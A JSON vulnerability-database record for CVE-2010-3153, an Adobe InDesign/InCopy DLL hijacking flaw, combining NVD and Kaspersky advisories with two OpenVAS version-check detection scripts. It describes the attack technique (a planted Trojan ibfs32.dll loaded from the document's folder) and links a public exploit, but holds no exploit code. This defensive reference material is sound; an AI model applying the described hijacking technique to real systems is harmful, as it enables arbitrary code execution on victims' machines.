{"cve": [{"lastseen": "2020-10-03T11:57:28", "description": "Untrusted search path vulnerability in Adobe InDesign CS4 6.0, InDesign CS5 7.0.2 and earlier, Adobe InDesign Server CS5 7.0.2 and earlier, and Adobe InCopy CS5 7.0.2 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse ibfs32.dll that is located in the same folder as an .indl, .indp, .indt, or .inx file.", "edition": 3, "cvss3": {}, "published": "2010-08-27T19:00:00", "title": "CVE-2010-3153", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3153"], "modified": "2018-10-10T20:01:00", "cpe": ["cpe:/a:adobe:indesign_cs4:6.0"], "id": "CVE-2010-3153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3153", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:indesign_cs4:6.0:*:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2020-09-02T11:41:32", "bulletinFamily": "info", "cvelist": ["CVE-2010-3153"], "description": "### *Detect date*:\n10/18/2010\n\n### *Severity*:\nCritical\n\n### *Description*:\nA critical vulnerability was found in Adobe InDesign and InCopy. By exploiting this vulnerability malicious users can execute arbitrary code. 
This vulnerability can be exploited locally and possibly remotely at a point related to an untrusted path via DLL hijacking.\n\n### *Affected products*:\nAdobe InDesign versions CS5 7.0.2 and earlier for Windows \nAdobe InDesign Server versions CS5 7.0.2 and earlier for Windows \nAdobe InCopy versions CS5 7.0.2 and earlier for Windows\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Adobe bulletin](<http://www.adobe.com/support/security/bulletins/apsb10-24.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe InDesign CS5](<https://threats.kaspersky.com/en/product/Adobe-InDesign-CS5/>)\n\n### *CVE-IDS*:\n[CVE-2010-3153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3153>) 9.3 Critical\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2010-10-18T00:00:00", "id": "KLA10037", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10037", "title": "KLA10037 ACE vulnerability in Adobe InDesign", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3153"], "description": "This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.", "modified": "2018-12-04T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:1361412562310801508", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801508", "type": "openvas", "title": "Adobe InDesign Insecure Library Loading Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_indesign_insecure_lib_load_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe InDesign Insecure Library Loading Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# 
Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801508\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-3153\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe InDesign Insecure Library Loading Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41126\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14775/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_indesign_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the application insecurely loading certain\nlibraries from the current working directory, which could allow attackers to\nexecute 
arbitrary code by tricking a user into opening a file from a network share.\");\n script_tag(name:\"solution\", value:\"Upgrade Adobe InDesign to version CS4 6.0.6 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attackers to execute\narbitrary code and conduct DLL hijacking attacks.\");\n script_tag(name:\"affected\", value:\"Adobe InDesign version CS4 6.0\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nadVer = get_kb_item(\"Adobe/InDesign/Ver\");\nif(isnull(adVer)){\n exit(0);\n}\n\nadobeVer = eregmatch(pattern:\" ([0-9.]+)\", string:adVer);\nif(!isnull(adobeVer[1]) && (\"CS4\" >< adVer))\n{\n if(version_is_equal(version:adobeVer[1], test_version:\"6.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3153"], "description": "This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.", "modified": "2017-02-10T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:801508", "href": "http://plugins.openvas.org/nasl.php?oid=801508", "type": "openvas", "title": "Adobe InDesign Insecure Library Loading Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_indesign_insecure_lib_load_vuln_win.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Adobe InDesign Insecure Library Loading Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi 
<santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attackers to execute\narbitrary code and conduct DLL hijacking attacks.\n\nImpact Level: Application.\";\n\ntag_affected = \"Adobe InDesign version CS4 6.0\";\n\ntag_insight = \"The flaw is due to the application insecurely loading certain\nlibraries from the current working directory, which could allow attackers to\nexecute arbitrary code by tricking a user into opening a file from a network\nshare.\";\n\ntag_solution = \"Upgrade Adobe InDesign to version CS4 6.0.6 or later.\nFor updates refer to http://www.adobe.com/downloads\";\n\ntag_summary = \"This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.\";\n\nif(description)\n{\n script_id(801508);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-3153\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe InDesign Insecure Library Loading Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41126\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14775/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_indesign_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe InDesign\nadVer = get_kb_item(\"Adobe/InDesign/Ver\");\nif(isnull(adVer)){\n exit(0);\n}\n\nadobeVer = eregmatch(pattern:\" ([0-9.]+)\", string:adVer);\nif(!isnull(adobeVer[1]) && (\"CS4\" >< adVer))\n{\n ## Check for Adobe InDesign CS4 version equals to 6.0\n if(version_is_equal(version:adobeVer[1], test_version:\"6.0\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}